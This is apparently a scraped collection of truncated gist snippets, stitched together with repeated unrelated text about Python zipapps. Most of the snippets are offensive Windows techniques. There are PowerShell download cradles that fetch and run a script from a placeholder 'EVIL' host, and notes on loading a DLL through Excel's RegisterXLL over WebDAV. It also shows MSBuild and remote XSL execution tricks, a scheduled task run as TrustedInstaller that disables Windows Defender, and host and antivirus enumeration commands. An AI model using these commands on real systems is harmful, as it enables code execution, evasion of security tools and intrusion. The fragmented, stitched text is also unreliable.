This concept is very much like .jar
or .war
archives in Java.
NOTE: The built
.pyz
zipapp can run on both Python 2 & 3 but you can only build.pyz
zipapps with Python 3.5 or later.
#! /usr/bin/env python | |
import sys | |
import re | |
import os | |
from decimal import Decimal #for conversion milliseconds -> seconds | |
if len(sys.argv) < 2: | |
print 'Usage: duck-hunter.py <duckyscript> output.txt' | |
#print 'Usage: duck-hunter.py <duckyscript> <language> output.txt' |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This concept is very much like .jar
or .war
archives in Java.
NOTE: The built
.pyz
zipapp can run on both Python 2 & 3 but you can only build.pyz
zipapps with Python 3.5 or later.
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
using System.Reflection; | |
using System.Reflection.Emit; | |
using System.Collections; | |
using System.Collections.Generic; |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace BlockDllTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> | |
<Target Name="Example"> | |
<ItemGroup> | |
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" /> | |
</ItemGroup> | |
<PropertyGroup> | |
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile> | |
</PropertyGroup> | |
<XslTransformation | |
OutputPaths="output.%(XmlFiles.FileName).html" |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
Host Enumeration: | |
--- OS Specifics --- | |
wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
wmic computersystem LIST full | |
--- Anti-Virus --- | |
wmic /namespace:\\root\securitycenter2 path antivirusproduct |